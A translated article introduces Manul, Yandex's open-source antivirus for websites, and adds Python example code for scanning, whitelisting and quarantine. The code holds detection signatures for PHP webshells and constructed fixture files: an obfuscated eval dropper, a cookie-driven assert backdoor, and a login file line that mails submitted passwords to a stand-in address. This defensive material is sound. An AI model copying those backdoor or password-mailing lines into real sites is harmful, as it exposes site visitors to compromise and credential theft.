
Yandex has released an antivirus for sites: Manul

Every day Yandex search shows more than eight million warnings that the page a user is about to open is infected. Often the site owner remembers that a site can be hacked and seeded with malicious code only after the worst has already happened: traffic has dropped and visitors have already been infected.

So that webmasters can react to problems as quickly as possible, we have for several years been sending infection alerts through Yandex.Webmaster. They contain detailed instructions on what to do, and in the most difficult cases our support service helps webmasters directly.


But one always wants to do better. One of the main problems we run into when talking to owners of infected sites is locating the source of the infection on the server side. Yandex flags thousands of sites every day as infected and dangerous to users' devices, and it maintains a regularly updated virus database. Out of this our team had an idea that grew into a big project: an antivirus for sites. The result is Manul, which we have decided to release as open source. It is a utility that helps a webmaster understand what happened to the site and clean it up. Below I will describe in more detail how it works and which problems it solves.

A site can become infected not only through a direct hack, but also by embedding the code of some third-party service that turned out to be less trustworthy than it first seemed. When this happens to a site that matters to many people, the damage goes beyond its owner.

Our support team receives dozens of emails from webmasters every day asking for help with an infection. But as a rule we see only the symptoms of the infection and often cannot say with certainty where on the server the malicious code should be looked for. Nor can we guarantee that the infection has only one source. So the main work of eliminating the cause falls on the site owner, and recovery may drag on. At the same time, we know that most of these problems are simple but mass infections that exploit, for example, long-known vulnerabilities in old versions of CMSs and individual components.

So we had the idea of building a simple tool: an antivirus utility that would collect structured information about the site. The collected data could then be analysed independently or sent to a specialist. Those specialists could be us, or studios and individual specialists who also clean up sites; and if the webmaster wished, they could do it themselves. And, of course, the tool should be able to produce a cleanup script that automates the process from start to finish, at least for ordinary cases.



We began to think about how this could be implemented. It was clear that it should be an easy-to-install utility that does not require administrator accounts. Since Yandex informs webmasters about infections on their sites, it is enough that, when such a notification arrives, the utility can be quickly downloaded and installed, and that once the cleanup is finished the folder with the antivirus can just as easily be deleted from the server.

Antivirus solutions for sites already existed on the market, but they differed from what we wanted to see: a free, open source tool that is easy to use and that anyone can develop and extend. When building our antivirus utility we decided to join forces with Revisium.

Gregory Zemskov of Revisium had extensive experience in scanning and cleaning sites on the server side, as well as a working solution, the Ai-Bolit script, which already contained a significant part of the desired functionality. We combined our knowledge and wishes, and something new came out of it: Manul.

How does all this work?


The archive with Manul is uploaded to the site's root directory, for example via FTP or SFTP, and unpacked there. Everything else is done through the browser. During a scan Manul collects information about every file in the root directory and below it: size, date of last modification and a hash sum. In parallel, each file is checked for malicious content against the bundled antivirus database and given one of three verdicts; the malicious and suspicious files are the ones the rest of the workflow acts on.


After the check completes, Manul saves everything it collected as an XML report. Code fragments, both suspicious and malicious, are attached to the report as well.
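To make the scan step concrete, here is an added example of the same idea: walk a web root, record size, mtime and a SHA-256 per file, match each file against a signature set and write an XML report with a snippet around every hit. It is illustration code written for this article, not Manul's own code (Manul is a PHP tool; Python is used here only so the example runs anywhere). The three signature patterns, the verdict names `clean` / `suspicious` / `malicious`, the report element names and the sample site in `demo()` are all constructed assumptions.

```python
"""Minimal site scanner in the spirit of Manul: walk a web root, record
size / mtime / SHA-256 for every file, match contents against a small
signature set, and write an XML report with a snippet around each hit.

Added illustration for this article, not Manul's own code. The signature
patterns, verdict names and sample site are constructed for the demo."""
import hashlib
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

# Constructed signature set (assumption: a real database is far larger).
# Ordered worst-first, so the first pattern that matches decides the verdict.
SIGNATURES = [
    ("malicious", re.compile(rb"eval\s*\(\s*(?:gzinflate|str_rot13|base64_decode)\s*\(")),
    ("malicious", re.compile(rb"\$[a-z_]+\s*=\s*\$_(?:GET|POST|REQUEST)\[[^\]]+\];\s*@?eval\s*\(")),
    ("suspicious", re.compile(rb"\b(?:eval|assert|create_function|system|passthru)\s*\(")),
]
SNIPPET_RADIUS = 40  # bytes of context kept on each side of a match


def scan_file(root, rel):
    """Collect metadata, hash and verdict for one file (path relative to root)."""
    full = os.path.join(root, rel)
    with open(full, "rb") as fh:
        data = fh.read()
    st = os.stat(full)
    verdict, snippet = "clean", ""
    for level, rx in SIGNATURES:
        m = rx.search(data)
        if m:
            verdict = level
            lo, hi = max(0, m.start() - SNIPPET_RADIUS), m.end() + SNIPPET_RADIUS
            snippet = data[lo:hi].decode("utf-8", "replace")
            break
    return {"path": rel, "size": st.st_size,
            "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "verdict": verdict, "snippet": snippet}


def scan_tree(root):
    """Scan every regular file under root; results are sorted by path."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            results.append(scan_file(root, rel))
    return sorted(results, key=lambda r: r["path"])


def write_report(results, out_path):
    """Serialise scan results as XML; snippets go in a child element."""
    report = ET.Element("report", generated=datetime.now(timezone.utc).isoformat())
    for r in results:
        f = ET.SubElement(report, "file", path=r["path"], size=str(r["size"]),
                          mtime=r["mtime"], sha256=r["sha256"], verdict=r["verdict"])
        if r["snippet"]:
            ET.SubElement(f, "snippet").text = r["snippet"]
    ET.ElementTree(report).write(out_path, encoding="utf-8", xml_declaration=True)


def read_verdicts(report_path):
    """Parse a report back into {path: verdict} (what an analyzer would do)."""
    root = ET.parse(report_path).getroot()
    return {f.get("path"): f.get("verdict") for f in root.iter("file")}


def demo():
    """Build a constructed three-file site in a temp dir, scan it, and
    return the verdicts read back from the written XML report."""
    root = tempfile.mkdtemp(prefix="manul-demo-")
    samples = {  # constructed site content
        "index.php": b"<?php require 'wp-blog-header.php';\n",
        "wp-content/uploads/cache.php":
            b"<?php /* cache */ eval(base64_decode('cGhwaW5mbygpOw==')); ?>\n",
        "wp-content/themes/t/functions.php":
            b"<?php function t_init(){ assert($_COOKIE['k']); }\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    results = scan_tree(root)          # scan before the report file exists
    report = os.path.join(root, "manul-report.xml")
    write_report(results, report)
    return read_verdicts(report)


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:10s} {path}")
```

The ordering of `SIGNATURES` matters: the `assert(` pattern would also match the `eval(base64_decode(` file, so the worst verdict has to be tried first. Hashing the whole file alongside the metadata is what later makes whitelisting by CMS baseline possible.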



To view the report there is a separate tool, the Manul Log Analyzer, available online. It presents the report as a table, lets you filter files by properties such as size and modification date, and shows the fragments of suspicious code. For various versions of popular CMSs the Analyzer automatically applies whitelists, so that files from the standard distribution that show no changes are filtered out immediately. The Quarantine and Delete buttons next to each file build a script for Manul that removes malicious files from the server and packs suspicious ones into an archive to be sent for analysis. You run that script by opening Manul and going to the Treatment tab.
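The following added example shows the triage side described above: hiding stock CMS files by baseline hash, keeping modified core files visible, and turning verdicts into quarantine / delete actions applied under the web root. It is written for this article and is not the Analyzer's or Manul's code; the report entries, the CMS baseline, the verdict names and the web root in `demo()` are constructed, and the rule that a file is hidden only when both its path and its hash match the baseline is an assumption about how such whitelisting should behave.

```python
"""Post-scan triage in the spirit of Manul's Log Analyzer and Treatment tab:
hide stock CMS files whose hash matches a shipped baseline, keep everything
else for review, then turn verdicts into a plan that quarantines suspicious
files into a zip and deletes malicious ones.

Added illustration, not the Analyzer's or Manul's own code. The report
entries, the CMS baseline and the web root are constructed in demo()."""
import hashlib
import os
import tempfile
import zipfile


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def apply_whitelist(entries, baseline):
    """Return the entries that still need attention. A file is hidden only
    when BOTH its path and its hash match the baseline, so a stock file that
    was modified in place stays visible and is flagged modified_core."""
    remaining = []
    for e in entries:
        expected = baseline.get(e["path"])
        if expected == e["sha256"]:
            continue                                   # untouched stock file
        remaining.append(dict(e, modified_core=expected is not None))
    return remaining


def plan_treatment(entries):
    """Verdict -> action, mirroring the Delete and Quarantine buttons.
    Clean verdicts (including modified core files) get no automatic action
    and are left to the reviewer."""
    actions = {"malicious": "delete", "suspicious": "quarantine"}
    return [(actions[e["verdict"]], e["path"]) for e in entries if e["verdict"] in actions]


def execute_plan(plan, web_root, quarantine_zip):
    """Apply the plan. Each path is resolved and checked to stay inside
    web_root before it is touched, so a crafted entry cannot reach outside."""
    root = os.path.realpath(web_root)
    done = []
    with zipfile.ZipFile(quarantine_zip, "w", zipfile.ZIP_DEFLATED) as zf:
        for action, rel in plan:
            full = os.path.realpath(os.path.join(root, rel))
            if os.path.commonpath([root, full]) != root:
                raise ValueError("path escapes web root: %r" % rel)
            if not os.path.isfile(full):
                continue
            if action == "quarantine":
                zf.write(full, arcname=rel)            # keep a copy for analysis
            os.remove(full)
            done.append((action, rel))
    return done


def demo():
    """Constructed web root with a stock file, a modified core file, a
    malicious dropper and a suspicious theme file; run the whole flow."""
    root = tempfile.mkdtemp(prefix="manul-triage-")
    stock_login = b"<?php // stock login form\n"
    files = {  # constructed web root
        "index.php": b"<?php require 'wp-blog-header.php';\n",
        "wp-login.php": stock_login + b"<?php mail('x@example.com', $_POST['pwd']);\n",
        "wp-content/uploads/cache.php": b"<?php eval(base64_decode('cGhwaW5mbygpOw=='));\n",
        "wp-content/themes/t/functions.php": b"<?php assert($_COOKIE['k']);\n",
    }
    verdicts = {"index.php": "clean", "wp-login.php": "clean",   # constructed scan verdicts
                "wp-content/uploads/cache.php": "malicious",
                "wp-content/themes/t/functions.php": "suspicious"}
    entries = []
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
        entries.append({"path": rel, "sha256": sha256_of(body), "verdict": verdicts[rel]})
    baseline = {"index.php": sha256_of(files["index.php"]),    # matches on disk
                "wp-login.php": sha256_of(stock_login)}         # differs on disk
    remaining = apply_whitelist(entries, baseline)
    plan = plan_treatment(remaining)
    qzip = os.path.join(root, "quarantine.zip")
    done = execute_plan(plan, root, qzip)
    with zipfile.ZipFile(qzip) as zf:
        quarantined = zf.namelist()
    try:                                               # a crafted script entry must be refused
        execute_plan([("delete", "../../etc/passwd")], root, os.path.join(root, "unused.zip"))
        traversal_rejected = False
    except ValueError:
        traversal_rejected = True
    return {
        "remaining": [e["path"] for e in remaining],
        "modified_core": [e["path"] for e in remaining if e["modified_core"]],
        "done": done,
        "quarantined": quarantined,
        "present": sorted(rel for rel in files if os.path.exists(os.path.join(root, rel))),
        "traversal_rejected": traversal_rejected,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Two points the example makes that the buttons alone do not: the whitelist must match on hash as well as path, otherwise a backdoored `wp-login.php` whose verdict was clean (the signatures missed the added `mail()` call) would vanish from the table together with the untouched stock files; and a treatment script that is generated elsewhere and executed on the server has to confine every path to the web root before deleting anything.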



Manul does not need access to sensitive data such as passwords. Every action on the files is reviewed and confirmed by the site owner. To keep third parties from using the tool, it must be protected with a password on first launch. No data about the site or the user is sent anywhere automatically while the utility is in use.

The utility is undemanding of its execution environment and is designed to run even on weak shared hosting. It still needs a few things: PHP 5.2 or later with the ZipArchive, DOM and XML extensions, and read access to the virtual host's web_root / public_html directory.

What next?


We decided to make it possible for any webmaster to benefit from our work. To that end we have put our antivirus on Yandex.Webmaster, and from now on we will remind webmasters of it every time we notify them that their site has been infected.

But we have decided not to stop here. We want every developer to be able not only to use Manul but also to give it a new life. Manul is an open source project published on GitHub. You can take part in its development, add new features or adapt the source code to your own needs.

Source: https://habr.com/ru/post/256463/
